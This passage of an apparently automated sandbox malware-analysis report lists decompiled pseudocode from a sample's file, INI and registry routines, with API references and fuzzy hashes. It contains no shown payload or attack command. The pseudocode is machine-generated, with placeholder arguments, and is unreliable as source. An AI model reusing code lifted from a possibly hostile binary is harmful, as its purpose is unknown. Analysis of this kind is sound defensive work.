				if(_t28 <= 0) {
					L9:
					_t29 = E706B295F();
					_t72 = _a4;
					_t79 =  *0x706b4048;
					 *((intOrPtr*)(_t29 + _t72)) = _t79;
					 *0x706b4048 = _t72;
					E706B2959();
					_t33 = ReadFile(??, ??, ??, ??, ??); // executed
					 *0x706b401c = _t33;
					 *0x706b4020 = _t79;
					if( *0x706b4040 != 0 && E706B293D( *0x706b4048) == 0) {
						 *0x706b403c = _t94;
						_t94 =  *0x706b4044;
					}
					_t80 =  *0x706b4048;
					_a4 = _t80;
					 *0x706b4048 =  *((intOrPtr*)(E706B295F() + _t80));
					_t37 = E706B294B(_t80);
					_pop(_t81);
					if(_t37 != 0) {
						_t40 = E706B296B(_t81);
						if(_t40 > 0) {
							_push(_t40);
							_push(E706B2976() + _a4 + _v8);
							_push(E706B2980());
							if( *0x706b4040 <= 0 || E706B293D(_a4) != 0) {
								_pop(_t88);
								_pop(_t45);
								__eflags =  *((intOrPtr*)(_t88 + _t45)) - 2;
								if(__eflags == 0) {
								}
								asm("loop 0xfffffff5");
							} else {
								_pop(_t89);
								_pop(_t49);
								 *0x706b403c =  *0x706b403c +  *(_t89 + _t49) * 4;
								asm("loop 0xffffffeb");
							}
						}
					}
					_t107 =  *0x706b4048;
					if( *0x706b4048 == 0) {
						 *0x706b403c = 0;
					}
					E706B29A4(_t107, _a4,  *0x706b401c,  *0x706b4020);
					return _a4;
				}
				_push(E706B2976() + _a4);
				_t56 = E706B297C();
				_v8 = _t56;
				_t77 = _t28;
				_push(_t68 + _t56 * _t77);
				_t70 = E706B2988();
				_t87 = E706B2984();
				_t90 = E706B2980();
				_t61 = _t77;
				if( *((intOrPtr*)(_t90 + _t61)) == 2) {
					_push( *((intOrPtr*)(_t70 + _t61)));
				}
				_push( *((intOrPtr*)(_t87 + _t61)));
				asm("loop 0xfffffff1");
				goto L9;
			}

























                                                      0x706b2a08
                                                      0x706b2a19
                                                      0x706b2a26
                                                      0x706b2a3a
                                                      0x706b2a28
                                                      0x706b2a2d
                                                      0x706b2a32
                                                      0x706b2a32
                                                      0x706b2a26
                                                      0x706b2a43
                                                      0x706b2a48
                                                      0x706b2a4e
                                                      0x706b2a92
                                                      0x706b2a92
                                                      0x706b2a97
                                                      0x706b2a9c
                                                      0x706b2aa2
                                                      0x706b2aa4
                                                      0x706b2aaa
                                                      0x706b2ab7
                                                      0x706b2ab9
                                                      0x706b2abe
                                                      0x706b2acb
                                                      0x706b2ade
                                                      0x706b2ae4
                                                      0x706b2aea
                                                      0x706b2aeb
                                                      0x706b2af1
                                                      0x706b2afd
                                                      0x706b2b03
                                                      0x706b2b0b
                                                      0x706b2b0c
                                                      0x706b2b0f
                                                      0x706b2b1a
                                                      0x706b2b1c
                                                      0x706b2b28
                                                      0x706b2b2e
                                                      0x706b2b36
                                                      0x706b2b62
                                                      0x706b2b63
                                                      0x706b2b65
                                                      0x706b2b69
                                                      0x706b2b69
                                                      0x706b2b70
                                                      0x706b2b46
                                                      0x706b2b46
                                                      0x706b2b47
                                                      0x706b2b55
                                                      0x706b2b5e
                                                      0x706b2b5e
                                                      0x706b2b36
                                                      0x706b2b1a
                                                      0x706b2b72
                                                      0x706b2b79
                                                      0x706b2b7b
                                                      0x706b2b7b
                                                      0x706b2b94
                                                      0x706b2ba2
                                                      0x706b2ba2
                                                      0x706b2a59
                                                      0x706b2a5a
                                                      0x706b2a5f
                                                      0x706b2a63
                                                      0x706b2a68
                                                      0x706b2a7c
                                                      0x706b2a7d
                                                      0x706b2a7e
                                                      0x706b2a80
                                                      0x706b2a85
                                                      0x706b2a87
                                                      0x706b2a87
                                                      0x706b2a8a
                                                      0x706b2a90
                                                      0x00000000

                                                      APIs
                                                      • ReadFile.KERNELBASE(00000000), ref: 706B2AB7
                                                      Memory Dump Source
                                                      • Source File: 00000002.00000002.1880663434.00000000706B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 706B0000, based on PE: true
                                                      • Associated: 00000002.00000002.1880594487.00000000706B0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000002.00000002.1880732550.00000000706B3000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000002.00000002.1880781272.00000000706B5000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_2_2_706b0000_download.jbxd
                                                      Similarity
                                                      • API ID: FileRead
                                                      • String ID:
                                                      • API String ID: 2738559852-0
                                                      • Opcode ID: 729d42de8215ce22247c9b85d125401b20cf848540882f3ce6aab04380f8fcc6
                                                      • Instruction ID: dbaec91265b3bb9adb87f556c7a4a1df20dc7d0dda32c2a02adc0dfc3a783c5a
                                                      • Opcode Fuzzy Hash: 729d42de8215ce22247c9b85d125401b20cf848540882f3ce6aab04380f8fcc6
                                                      • Instruction Fuzzy Hash: B04191F3904246DFDB21BFA6DCB5B9D77F6EB04354F308629E609C61A0C67CA8418B94
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 004025CA Relevance: 1.6, APIs: 1, Instructions: 76COMMON
                                                      Download Yara Rule
                                                      C-Code - Quality: 100%
                                                      			E004025CA(intOrPtr __ebx, intOrPtr __edx, void* __edi, void* __esi) {
				intOrPtr _t27;
				intOrPtr _t33;
				void* _t38;
				void* _t41;

				_t33 = __edx;
				 *((intOrPtr*)(_t38 - 8)) = __ebx;
				_t27 = E00402AA9(2);
				_t41 = _t27 - 1;
				 *((intOrPtr*)(_t38 - 0x3c)) = _t33;
				 *((intOrPtr*)(_t38 - 0xc)) = _t27;
				if(_t41 < 0) {
					L24:
					 *0x7a2fe8 =  *0x7a2fe8 +  *(_t38 - 4);
				} else {
					__ecx = 0x3ff;
					if(__eax > 0x3ff) {
						 *((intOrPtr*)(__ebp - 0xc)) = 0x3ff;
					}
					if( *__esi == __bl) {
						L21:
						__esi =  *((intOrPtr*)(__ebp - 8));
						goto L22;
					} else {
						 *((char*)(__ebp + 0xb)) = __bl;
						 *(__ebp - 0x30) = E00405EF4(__ecx, __esi);
						if( *((intOrPtr*)(__ebp - 0xc)) <= __ebx) {
							goto L21;
						} else {
							__esi =  *((intOrPtr*)(__ebp - 8));
							while(1) {
								__eax = __ebp - 0xd;
								__eax = E00405B8E( *(__ebp - 0x30), __ebp - 0xd, 1); // executed
								if(__eax == 0) {
									break;
								}
								if( *((intOrPtr*)(__ebp - 0x1c)) != __ebx) {
									 *(__ebp - 0xd) & 0x000000ff = E00405EDB(__edi,  *(__ebp - 0xd) & 0x000000ff);
								} else {
									if( *((char*)(__ebp + 0xb)) == 0xd ||  *((char*)(__ebp + 0xb)) == 0xa) {
										__al =  *(__ebp - 0xd);
										if( *((intOrPtr*)(__ebp + 0xb)) == __al || __al != 0xd && __al != 0xa) {
											__eax = SetFilePointer( *(__ebp - 0x30), 0xffffffff, __ebx, 1);
										} else {
											 *((char*)(__esi + __edi)) = __al;
											__esi = __esi + 1;
										}
										break;
									} else {
										__al =  *(__ebp - 0xd);
										 *((char*)(__esi + __edi)) = __al;
										__esi = __esi + 1;
										 *((char*)(__ebp + 0xb)) = __al;
										if(__al == __bl) {
											break;
										} else {
											if(__esi <  *((intOrPtr*)(__ebp - 0xc))) {
												continue;
											} else {
												break;
											}
										}
									}
								}
								goto L25;
							}
							L22:
							 *((char*)(__esi + __edi)) = __bl;
							if(_t41 == 0) {
								 *(_t38 - 4) = 1;
							}
							goto L24;
						}
					}
				}
				L25:
				return 0;
			}







                                                      0x004025ca
                                                      0x004025cc
                                                      0x004025cf
                                                      0x004025d4
                                                      0x004025d8
                                                      0x004025db
                                                      0x004025de
                                                      0x00402957
                                                      0x0040295a
                                                      0x004025e4
                                                      0x004025e4
                                                      0x004025eb
                                                      0x004025ed
                                                      0x004025ed
                                                      0x004025f2
                                                      0x0040267a
                                                      0x0040267a
                                                      0x00000000
                                                      0x004025f8
                                                      0x004025f9
                                                      0x00402604
                                                      0x00402607
                                                      0x00000000
                                                      0x00402609
                                                      0x00402609
                                                      0x0040260c
                                                      0x0040260c
                                                      0x00402615
                                                      0x0040261c
                                                      0x00000000
                                                      0x00000000
                                                      0x00402621
                                                      0x0040264a
                                                      0x00402623
                                                      0x00402627
                                                      0x00402654
                                                      0x0040265a
                                                      0x00402672
                                                      0x00402664
                                                      0x00402664
                                                      0x00402667
                                                      0x00402667
                                                      0x00000000
                                                      0x0040262f
                                                      0x0040262f
                                                      0x00402632
                                                      0x00402635
                                                      0x00402638
                                                      0x0040263b
                                                      0x00000000
                                                      0x0040263d
                                                      0x00402640
                                                      0x00000000
                                                      0x00402642
                                                      0x00000000
                                                      0x00402642
                                                      0x00402640
                                                      0x0040263b
                                                      0x00402627
                                                      0x00000000
                                                      0x00402621
                                                      0x0040267d
                                                      0x0040267d
                                                      0x004015b0
                                                      0x0040271c
                                                      0x0040271c
                                                      0x00000000
                                                      0x004015b0
                                                      0x00402607
                                                      0x004025f2
                                                      0x00402960
                                                      0x00402966

                                                      Memory Dump Source
                                                      • Source File: 00000002.00000002.1796335749.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000002.00000002.1796282530.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000002.00000002.1796418503.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000002.00000002.1796470096.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000002.00000002.1796470096.000000000077B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000002.00000002.1796470096.0000000000780000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000002.00000002.1796470096.0000000000785000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000002.00000002.1796470096.0000000000787000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000002.00000002.1796470096.00000000007A0000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000002.00000002.1796470096.00000000007A4000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000002.00000002.1796470096.00000000007A9000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000002.00000002.1796470096.00000000007AE000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000002.00000002.1796470096.00000000007C6000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000002.00000002.1798213099.00000000007C7000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_2_2_400000_download.jbxd
                                                      Similarity
                                                      • API ID: wsprintf
                                                      • String ID:
                                                      • API String ID: 2111968516-0
                                                      • Opcode ID: 255e133b5fdcbc2f7a9ca64d0d55690020652cb371cb3a25a4775619f9253d8f
                                                      • Instruction ID: c2a1b850aa9b93e4cbc4820df7219add1c6eba77a771e25ce3fc61ee94bd300f
                                                      • Opcode Fuzzy Hash: 255e133b5fdcbc2f7a9ca64d0d55690020652cb371cb3a25a4775619f9253d8f
                                                      • Instruction Fuzzy Hash: C121E770C04299BADF218BA99548AAEBF749F11314F1448BFE490B62D1C6BD8A81CF19
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 0040166A Relevance: 1.5, APIs: 1, Instructions: 38fileCOMMON
                                                      Download Yara Rule
                                                      C-Code - Quality: 70%
                                                      			E0040166A() {
				int _t7;
				void* _t13;
				void* _t15;
				void* _t20;

				_t18 = E00402ACB(0xffffffd0);
				_t16 = E00402ACB(0xffffffdf);
				E00402ACB(0x13);
				_t7 = MoveFileA(_t4, _t5); // executed
				if(_t7 == 0) {
					if( *((intOrPtr*)(_t20 - 0x20)) == _t13 || E00406280(_t18) == 0) {
						 *((intOrPtr*)(_t20 - 4)) = 1;
					} else {
						E00405D5C(_t15, _t18, _t16);
						_push(0xffffffe4);
						goto L5;
					}
				} else {
					_push(0xffffffe3);
					L5:
					E00401423();
				}
				 *0x7a2fe8 =  *0x7a2fe8 +  *((intOrPtr*)(_t20 - 4));
				return 0;
			}







                                                      0x00401673
                                                      0x0040167c
                                                      0x0040167e
                                                      0x00401685
                                                      0x0040168d
                                                      0x00401699
                                                      0x0040271c
                                                      0x004016ad
                                                      0x004016af
                                                      0x004016b4
                                                      0x00000000
                                                      0x004016b4
                                                      0x0040168f
                                                      0x0040168f
                                                      0x0040223d
                                                      0x0040223d
                                                      0x0040223d
                                                      0x0040295a
                                                      0x00402966

                                                      APIs
                                                      • MoveFileA.KERNEL32(00000000,00000000), ref: 00401685
                                                      Memory Dump Source
                                                      • Source File: 00000002.00000002.1796335749.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000002.00000002.1796282530.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000002.00000002.1796418503.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000002.00000002.1796470096.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000002.00000002.1796470096.000000000077B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000002.00000002.1796470096.0000000000780000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000002.00000002.1796470096.0000000000785000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000002.00000002.1796470096.0000000000787000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000002.00000002.1796470096.00000000007A0000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000002.00000002.1796470096.00000000007A4000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000002.00000002.1796470096.00000000007A9000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000002.00000002.1796470096.00000000007AE000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000002.00000002.1796470096.00000000007C6000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000002.00000002.1798213099.00000000007C7000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_2_2_400000_download.jbxd
                                                      Similarity
                                                      • API ID: FileMove
                                                      • String ID:
                                                      • API String ID: 3562171763-0
                                                      • Opcode ID: ffb8758106d718844b4ca8497fa130c870188eea5682979d4ef787b9ceac6626
                                                      • Instruction ID: 2d7bf1c298bed6491edf678891ac3a09e03c979460778333709229851ac33c08
                                                      • Opcode Fuzzy Hash: ffb8758106d718844b4ca8497fa130c870188eea5682979d4ef787b9ceac6626
                                                      • Instruction Fuzzy Hash: 77F09031704221A7CB20B6A94F5DD9F56648F8236CB244A3FF111B21E2DABD8902867F
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 00402688 Relevance: 1.5, APIs: 1, Instructions: 28COMMON
                                                      Download Yara Rule
                                                      C-Code - Quality: 40%
                                                      			E00402688(intOrPtr __edx, void* __eflags) {
				long _t7;
				long _t9;
				LONG* _t11;
				void* _t13;
				intOrPtr _t14;
				void* _t17;
				void* _t19;

				_t14 = __edx;
				_push(ds);
				if(__eflags != 0) {
					_t7 = E00402AA9(2);
					_pop(_t13);
					 *((intOrPtr*)(_t19 - 0x3c)) = _t14;
					_t9 = SetFilePointer(E00405EF4(_t13, _t17), _t7, _t11,  *(_t19 - 0x1c)); // executed
					if( *((intOrPtr*)(_t19 - 0x24)) >= _t11) {
						_push(_t9);
						E00405EDB();
					}
				}
				 *0x7a2fe8 =  *0x7a2fe8 +  *((intOrPtr*)(_t19 - 4));
				return 0;
			}










                                                      0x00402688
                                                      0x00402688
                                                      0x00402689
                                                      0x00402691
                                                      0x00402696
                                                      0x00402697
                                                      0x004026a6
                                                      0x004026af
                                                      0x004028fd
                                                      0x004028ff
                                                      0x004028ff
                                                      0x004026af
                                                      0x0040295a
                                                      0x00402966

                                                      APIs
                                                      • SetFilePointer.KERNELBASE(00000000,?,00000000,?,?), ref: 004026A6
                                                        • Part of subcall function 00405EDB: wsprintfA.USER32 ref: 00405EE8
                                                      Memory Dump Source
                                                      • Source File: 00000002.00000002.1796335749.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000002.00000002.1796282530.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000002.00000002.1796418503.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000002.00000002.1796470096.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000002.00000002.1796470096.000000000077B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000002.00000002.1796470096.0000000000780000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000002.00000002.1796470096.0000000000785000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000002.00000002.1796470096.0000000000787000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000002.00000002.1796470096.00000000007A0000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000002.00000002.1796470096.00000000007A4000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000002.00000002.1796470096.00000000007A9000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000002.00000002.1796470096.00000000007AE000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000002.00000002.1796470096.00000000007C6000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000002.00000002.1798213099.00000000007C7000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_2_2_400000_download.jbxd
                                                      Similarity
                                                      • API ID: FilePointerwsprintf
                                                      • String ID:
                                                      • API String ID: 327478801-0
                                                      • Opcode ID: 8303a16c8324cd1585bb4d8f8fd59fc2d4d610d9dc2ffc373cffb4fce9594ffb
                                                      • Instruction ID: 110f2c4880f6573f93162833435315c6132d41cf51db6092c043686707d14882
                                                      • Opcode Fuzzy Hash: 8303a16c8324cd1585bb4d8f8fd59fc2d4d610d9dc2ffc373cffb4fce9594ffb
                                                      • Instruction Fuzzy Hash: 39E0EDB2B00116AADB01EBD5AA49CBFB768DF40318B10403BF141B50D1CA7D4A029B2D
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 004022FC Relevance: 1.5, APIs: 1, Instructions: 26COMMON
                                                      Download Yara Rule
                                                      C-Code - Quality: 100%
                                                      			E004022FC(int __eax, CHAR* __ebx) {
				CHAR* _t11;
				void* _t13;
				CHAR* _t14;
				void* _t18;
				int _t22;

				_t11 = __ebx;
				_t5 = __eax;
				_t14 = 0;
				if(__eax != __ebx) {
					__eax = E00402ACB(__ebx);
				}
				if(_t13 != _t11) {
					_t14 = E00402ACB(0x11);
				}
				if( *((intOrPtr*)(_t18 - 0x18)) != _t11) {
					_t11 = E00402ACB(0x22);
				}
				_t5 = WritePrivateProfileStringA(0, _t14, _t11, E00402ACB(0xffffffcd)); // executed
				_t22 = _t5;
				if(_t22 == 0) {
					 *((intOrPtr*)(_t18 - 4)) = 1;
				}
				 *0x7a2fe8 =  *0x7a2fe8 +  *((intOrPtr*)(_t18 - 4));
				return 0;
			}








                                                      0x004022fc
                                                      0x004022fc
                                                      0x004022fe
                                                      0x00402302
                                                      0x00402305
                                                      0x0040230d
                                                      0x00402311
                                                      0x0040231a
                                                      0x0040231a
                                                      0x0040231f
                                                      0x00402328
                                                      0x00402328
                                                      0x00402335
                                                      0x004015ae
                                                      0x004015b0
                                                      0x0040271c
                                                      0x0040271c
                                                      0x0040295a
                                                      0x00402966

                                                      APIs
                                                      • WritePrivateProfileStringA.KERNEL32(00000000,00000000,?,00000000), ref: 00402335
                                                      Memory Dump Source
                                                      • Source File: 00000002.00000002.1796335749.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000002.00000002.1796282530.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000002.00000002.1796418503.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000002.00000002.1796470096.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000002.00000002.1796470096.000000000077B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000002.00000002.1796470096.0000000000780000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000002.00000002.1796470096.0000000000785000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000002.00000002.1796470096.0000000000787000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000002.00000002.1796470096.00000000007A0000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000002.00000002.1796470096.00000000007A4000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000002.00000002.1796470096.00000000007A9000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000002.00000002.1796470096.00000000007AE000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000002.00000002.1796470096.00000000007C6000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000002.00000002.1798213099.00000000007C7000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_2_2_400000_download.jbxd
                                                      Similarity
                                                      • API ID: PrivateProfileStringWrite
                                                      • String ID:
                                                      • API String ID: 390214022-0
                                                      • Opcode ID: a35f8e91713f0605e290066fe2cc807c403f3e4948e2e514c4de22b42c68f79f
                                                      • Instruction ID: fc3d639ee2ba9d49225374e904560d05d066977e3d8f4235cfc91afb5433c7ac
                                                      • Opcode Fuzzy Hash: a35f8e91713f0605e290066fe2cc807c403f3e4948e2e514c4de22b42c68f79f
                                                      • Instruction Fuzzy Hash: 2FE012317005146BD72076B10FCE96F10989BC4308B284D3AF502761C6DDBD4D4245B9
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 0040171F Relevance: 1.5, APIs: 1, Instructions: 24COMMON
                                                      Download Yara Rule
                                                      C-Code - Quality: 100%
                                                      			E0040171F() {
				long _t5;
				CHAR* _t8;
				CHAR* _t12;
				void* _t14;
				long _t17;

				_t5 = SearchPathA(_t8, E00402ACB(0xffffffff), _t8, 0x400, _t12, _t14 + 8); // executed
				_t17 = _t5;
				if(_t17 == 0) {
					 *((intOrPtr*)(_t14 - 4)) = 1;
					 *_t12 = _t8;
				}
				 *0x7a2fe8 =  *0x7a2fe8 +  *((intOrPtr*)(_t14 - 4));
				return 0;
			}








                                                      0x00401733
                                                      0x00401739
                                                      0x0040173b
                                                      0x004026f0
                                                      0x004026f7
                                                      0x004026f7
                                                      0x0040295a
                                                      0x00402966

                                                      APIs
                                                      • SearchPathA.KERNELBASE(?,00000000,?,00000400,?,?,000000FF), ref: 00401733
                                                      Memory Dump Source
                                                      • Source File: 00000002.00000002.1796335749.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000002.00000002.1796282530.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000002.00000002.1796418503.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000002.00000002.1796470096.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000002.00000002.1796470096.000000000077B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000002.00000002.1796470096.0000000000780000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000002.00000002.1796470096.0000000000785000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000002.00000002.1796470096.0000000000787000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000002.00000002.1796470096.00000000007A0000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000002.00000002.1796470096.00000000007A4000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000002.00000002.1796470096.00000000007A9000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000002.00000002.1796470096.00000000007AE000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000002.00000002.1796470096.00000000007C6000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000002.00000002.1798213099.00000000007C7000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_2_2_400000_download.jbxd
                                                      Similarity
                                                      • API ID: PathSearch
                                                      • String ID:
                                                      • API String ID: 2203818243-0
                                                      • Opcode ID: ec3f6c22f74dbc9dc9b5470527ecbb0f659c4474b53f7c7e74f6d3e7950ec302
                                                      • Instruction ID: a921dc9e30d1d81fe6b9094ed5ee79d2c80462cb6aa05ca6df5bdeca8f1c6b24
                                                      • Opcode Fuzzy Hash: ec3f6c22f74dbc9dc9b5470527ecbb0f659c4474b53f7c7e74f6d3e7950ec302
                                                      • Instruction Fuzzy Hash: 68E0D8B1300141ABDB00DBA89D49EAA7B58DB40368F20853AE111A60C2D2B949419728
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 00405E31 Relevance: 1.5, APIs: 1, Instructions: 24registryCOMMON
                                                      Download Yara Rule
                                                      C-Code - Quality: 100%
                                                      			E00405E31(void* __eflags, intOrPtr _a4, char* _a8, int _a12, void** _a16) {
				void* _t7;
				long _t8;
				void* _t9;

				_t7 = E00405D88(_a4,  &_a12);
				if(_t7 != 0) {
					_t8 = RegCreateKeyExA(_t7, _a8, 0, 0, 0, _a12, 0, _a16, 0); // executed
					return _t8;
				}
				_t9 = 6;
				return _t9;
			}






                                                      0x00405e3b
                                                      0x00405e44
                                                      0x00405e5a
                                                      0x00000000
                                                      0x00405e5a
                                                      0x00405e48
                                                      0x00000000

                                                      APIs
                                                      • RegCreateKeyExA.KERNELBASE(00000000,?,00000000,00000000,00000000,?,00000000,?,00000000,?,?,?,00402B7C,00000000,?,?), ref: 00405E5A
                                                      Memory Dump Source
                                                      • Source File: 00000002.00000002.1796335749.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000002.00000002.1796282530.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000002.00000002.1796418503.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000002.00000002.1796470096.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000002.00000002.1796470096.000000000077B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000002.00000002.1796470096.0000000000780000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000002.00000002.1796470096.0000000000785000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000002.00000002.1796470096.0000000000787000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000002.00000002.1796470096.00000000007A0000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000002.00000002.1796470096.00000000007A4000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000002.00000002.1796470096.00000000007A9000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000002.00000002.1796470096.00000000007AE000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000002.00000002.1796470096.00000000007C6000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000002.00000002.1798213099.00000000007C7000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_2_2_400000_download.jbxd
                                                      Similarity
                                                      • API ID: Create
                                                      • String ID:
                                                      • API String ID: 2289755597-0
                                                      • Opcode ID: e8292e86e66d8bfc399a73dea3ede4946860b06fd3b50e0b30bb299c90100862
                                                      • Instruction ID: 33ca04e46434342caff68362b3d2cda83283301915701ba1f7808c3e8cd8b3f6
                                                      • Opcode Fuzzy Hash: e8292e86e66d8bfc399a73dea3ede4946860b06fd3b50e0b30bb299c90100862
                                                      • Instruction Fuzzy Hash: F9E0ECB211050DBEEF195F90DD0ADBB3B1DEB04344F50492EFA46E4090E6B5EA20AE78
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 00405B8E Relevance: 1.5, APIs: 1, Instructions: 22fileCOMMON
                                                      Download Yara Rule
                                                      C-Code - Quality: 100%
                                                      			E00405B8E(void* _a4, void* _a8, long _a12) {
				int _t7;
				long _t11;

				_t11 = _a12;
				_t7 = ReadFile(_a4, _a8, _t11,  &_a12, 0); // executed
				if(_t7 == 0 || _t11 != _a12) {
					return 0;
				} else {
					return 1;
				}
			}





                                                      0x00405b92
                                                      0x00405ba2
                                                      0x00405baa
                                                      0x00000000
                                                      0x00405bb1
                                                      0x00000000
                                                      0x00405bb3

                                                      APIs
                                                      • ReadFile.KERNELBASE(00000000,00000000,00000004,00000004,00000000,000000FF,?,0040319E,00000000,00000000,00402FEB,000000FF,00000004,00000000,00000000,00000000), ref: 00405BA2
                                                      Memory Dump Source
                                                      • Source File: 00000002.00000002.1796335749.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
